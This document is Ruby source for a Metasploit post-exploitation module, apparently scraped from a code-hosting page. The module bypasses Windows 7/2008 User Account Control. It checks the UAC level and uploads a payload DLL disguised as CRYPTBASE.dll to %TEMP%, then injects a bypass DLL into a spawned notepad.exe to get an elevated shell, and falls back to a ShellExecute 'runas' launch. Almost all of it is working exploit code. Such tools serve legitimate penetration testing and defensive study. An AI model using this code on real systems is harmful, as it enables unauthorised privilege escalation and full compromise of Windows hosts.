def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows Escalate UAC Protection Bypass (In Memory Injection)',
|
||||
'Description' => %q{
|
||||
This module will bypass Windows UAC by utilizing the trusted publisher
|
||||
certificate through process injection. It will spawn a second shell that
|
||||
has the UAC flag turned off. This module uses the Reflective DLL Injection
|
||||
technique to drop only the DLL payload binary instead of three seperate
|
||||
binaries in the standard technique. However, it requires the correct
|
||||
architecture to be selected, (use x64 for SYSWOW64 systems also).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
|
||||
'mitnick',
|
||||
'mubix', # Port to local exploit
|
||||
'Ben Campbell <eat_meatballs[at]hotmail.co.uk' # In memory technique
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'Targets' => [
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
[
|
||||
'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/',
|
||||
'URL', 'http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html'
|
||||
]
|
||||
],
|
||||
'DisclosureDate'=> "Dec 31 2010"
|
||||
))
|
||||
|
||||
end
|
||||
|
||||
def bypass_dll_path
|
||||
# path to the bypassuac binary
|
||||
path = ::File.join(Msf::Config.data_directory, "post")
|
||||
|
||||
# decide, x86 or x64
|
||||
sysarch = sysinfo["Architecture"]
|
||||
if sysarch =~ /x64/i
|
||||
unless(target_arch.first =~ /64/i) and (payload_instance.arch.first =~ /64/i)
|
||||
fail_with(
|
||||
Exploit::Failure::BadConfig,
|
||||
"x86 Target Selected for x64 System"
|
||||
)
|
||||
end
|
||||
|
||||
if sysarch =~ /WOW64/i
|
||||
return ::File.join(path, "bypassuac-x86.dll")
|
||||
else
|
||||
return ::File.join(path, "bypassuac-x64.dll")
|
||||
end
|
||||
else
|
||||
if (target_arch.first =~ /64/i) or (payload_instance.arch.first =~ /64/i)
|
||||
fail_with(
|
||||
Exploit::Failure::BadConfig,
|
||||
"x64 Target Selected for x86 System"
|
||||
)
|
||||
end
|
||||
|
||||
::File.join(path, "bypassuac-x86.dll")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
def check_permissions!
|
||||
# Check if you are an admin
|
||||
vprint_status('Checking admin status...')
|
||||
admin_group = is_in_admin_group?
|
||||
|
||||
if admin_group.nil?
|
||||
print_error('Either whoami is not there or failed to execute')
|
||||
print_error('Continuing under assumption you already checked...')
|
||||
else
|
||||
if admin_group
|
||||
print_good('Part of Administrators group! Continuing...')
|
||||
else
|
||||
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||
end
|
||||
end
|
||||
|
||||
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
def exploit
|
||||
validate_environment!
|
||||
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||
fail_with(Exploit::Failure::NotVulnerable,
|
||||
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
||||
)
|
||||
when UAC_DEFAULT
|
||||
print_good "UAC is set to Default"
|
||||
print_good "BypassUAC can bypass this setting, continuing..."
|
||||
when UAC_NO_PROMPT
|
||||
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
||||
runas_method
|
||||
return
|
||||
end
|
||||
|
||||
check_permissions!
|
||||
|
||||
@temp_path = expand_path('%TEMP%').strip
|
||||
|
||||
upload_payload_dll!
|
||||
|
||||
pid = spawn_inject_proc
|
||||
|
||||
run_injection(pid, bypass_dll_path)
|
||||
|
||||
# delete the uac bypass payload
|
||||
vprint_status("Cleaning up payload file...")
|
||||
file_rm(payload_filepath)
|
||||
end
|
||||
|
||||
|
||||
def payload_filepath
|
||||
"#{@temp_path}\\CRYPTBASE.dll"
|
||||
end
|
||||
|
||||
|
||||
|
||||
def runas_method
|
||||
payload = generate_payload_exe
|
||||
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
tmpdir = expand_path("%TEMP%")
|
||||
tempexe = tmpdir + "\\" + payload_filename
|
||||
write_file(tempexe, payload)
|
||||
print_status("Uploading payload: #{tempexe}")
|
||||
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
|
||||
print_status("Payload executed")
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def run_injection(pid, dll_path)
|
||||
vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
|
||||
begin
|
||||
vprint_status("Opening process #{pid}")
|
||||
host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
|
||||
exploit_mem, offset = inject_dll_into_process(host_process, dll_path)
|
||||
vprint_status("Executing payload")
|
||||
thread = host_process.thread.create(exploit_mem + offset, 0)
|
||||
print_good("Successfully injected payload in to process: #{pid}")
|
||||
client.railgun.kernel32.WaitForSingleObject(thread.handle,14000)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
print_error("Failed to Inject Payload to #{pid}!")
|
||||
vprint_error(e.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
def spawn_inject_proc
|
||||
windir = expand_path("%WINDIR%").strip
|
||||
print_status("Spawning process with Windows Publisher Certificate, to inject into...")
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
pid = cmd_exec_get_pid(cmd)
|
||||
|
||||
unless pid
|
||||
fail_with(Exploit::Failure::Unknown, "Spawning Process failed...")
|
||||
end
|
||||
|
||||
pid
|
||||
end
|
||||
|
||||
|
||||
|
||||
def upload_payload_dll!
|
||||
payload = generate_payload_dll({:dll_exitprocess => true})
|
||||
print_status("Uploading the Payload DLL to the filesystem...")
|
||||
begin
|
||||
vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
|
||||
write_file(payload_filepath, payload)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
fail_with(
|
||||
Exploit::Exception::Unknown,
|
||||
"Error uploading file #{payload_filepath}: #{e.class} #{e}"
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def validate_environment!
|
||||
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||
|
||||
winver = sysinfo["OS"]
|
||||
|
||||
unless winver =~ /Windows 2008|Windows [7]/
|
||||
fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
|
||||
end
|
||||
|
||||
if is_uac_enabled?
|
||||
print_status "UAC is Enabled, checking level..."
|
||||
else
|
||||
if is_in_admin_group?
|
||||
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
|
||||
else
|
||||
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
Loading…
Reference in New Issue